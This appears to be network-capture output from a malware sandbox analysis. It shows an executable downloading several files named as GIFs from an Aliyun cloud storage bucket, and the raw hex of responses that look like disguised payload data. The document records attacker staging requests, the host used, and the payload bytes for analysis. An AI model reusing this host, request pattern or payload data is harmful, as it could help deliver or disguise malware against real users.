2025-01-13 12:54:10 UTC	4096	IN	Data Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17 Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
2025-01-13 12:54:10 UTC	4096	IN	Data Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58 Data Ascii: UqLT&&oabc\|}~x3~=,N<>HEO>L.XU_.\heo+lxu;\|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
2025-01-13 12:54:10 UTC	4096	IN	Data Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52 Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph\|{NJLR
2025-01-13 12:54:10 UTC	4096	IN	Data Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19 Data Ascii: WUsXa`e/nnbc\|}~x;9y}QTp\|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o\|PRSTY'xe89-jYkk$P}wtuixyz\|~9~mMtwv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	59.110.190.21	443	7448	C:\Users\user\Desktop\149876985-734579485.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:54:12 UTC	106	OUT	GET /b.gif HTTP/1.1 User-Agent: 3M Host: khec3y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-13 12:54:12 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 12:54:12 GMT Content-Type: image/gif Content-Length: 125333 Connection: close x-oss-request-id: 67850CF4F15BB232314B5E66 Accept-Ranges: bytes ETag: "2CA9F4AB0970AA58989D66D9458F8701" Last-Modified: Mon, 13 Jan 2025 11:34:41 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10333201072197591521 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: LKn0qwlwqliYnWbZRY+HAQ== x-oss-server-time: 10
2025-01-13 12:54:12 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-13 12:54:12 UTC	4096	IN	Data Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 Data Ascii: ^_X$pdddefg`abc\|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123\|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
2025-01-13 12:54:12 UTC	4096	IN	Data Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
2025-01-13 12:54:13 UTC	4096	IN	Data Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
2025-01-13 12:54:13 UTC	4096	IN	Data Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 Data Ascii: ,\|&#&z?JdPJ0z}\|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i\|k}mzf\|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
2025-01-13 12:54:13 UTC	4096	IN	Data Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{\|KH
2025-01-13 12:54:13 UTC	4096	IN	Data Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n\|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
2025-01-13 12:54:13 UTC	4096	IN	Data Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d Data Ascii: RWrlmnohfjkdefg`abc\|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
2025-01-13 12:54:13 UTC	4096	IN	Data Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[\|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-wZbjhYklc8wP=0{y}@zvMbrqp
2025-01-13 12:54:13 UTC	4096	IN	Data Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9\|<d?p%~}~jJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	59.110.190.21	443	7448	C:\Users\user\Desktop\149876985-734579485.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:54:14 UTC	106	OUT	GET /c.gif HTTP/1.1 User-Agent: 3M Host: khec3y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-13 12:54:15 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 12:54:15 GMT Content-Type: image/gif Content-Length: 10681 Connection: close x-oss-request-id: 67850CF7F06ABA3430C1990A Accept-Ranges: bytes ETag: "10A818386411EE834D99AE6B7B68BE71" Last-Modified: Mon, 13 Jan 2025 11:34:40 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10287299869673359293 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: EKgYOGQR7oNNma5re2i+cQ== x-oss-server-time: 7
2025-01-13 12:54:15 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-13 12:54:15 UTC	4096	IN	Data Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39 Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E\|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
2025-01-13 12:54:15 UTC	3034	IN	Data Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27 Data Ascii: L]y%-/cZ<+Xd}_h48a7?79:dOtLO2/uR& PeY e@lUO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	59.110.190.21	443	7448	C:\Users\user\Desktop\149876985-734579485.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:54:16 UTC	106	OUT	GET /d.gif HTTP/1.1 User-Agent: 3M Host: khec3y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-13 12:54:16 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 12:54:16 GMT Content-Type: image/gif Content-Length: 3892010 Connection: close x-oss-request-id: 67850CF81F7AD9393228625A Accept-Ranges: bytes ETag: "E4E46F3980A9D799B1BD7FC408F488A3" Last-Modified: Mon, 13 Jan 2025 11:34:51 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 3363616613234190325 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5ORvOYCp15mxvX/ECPSIow== x-oss-server-time: 20
2025-01-13 12:54:16 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: 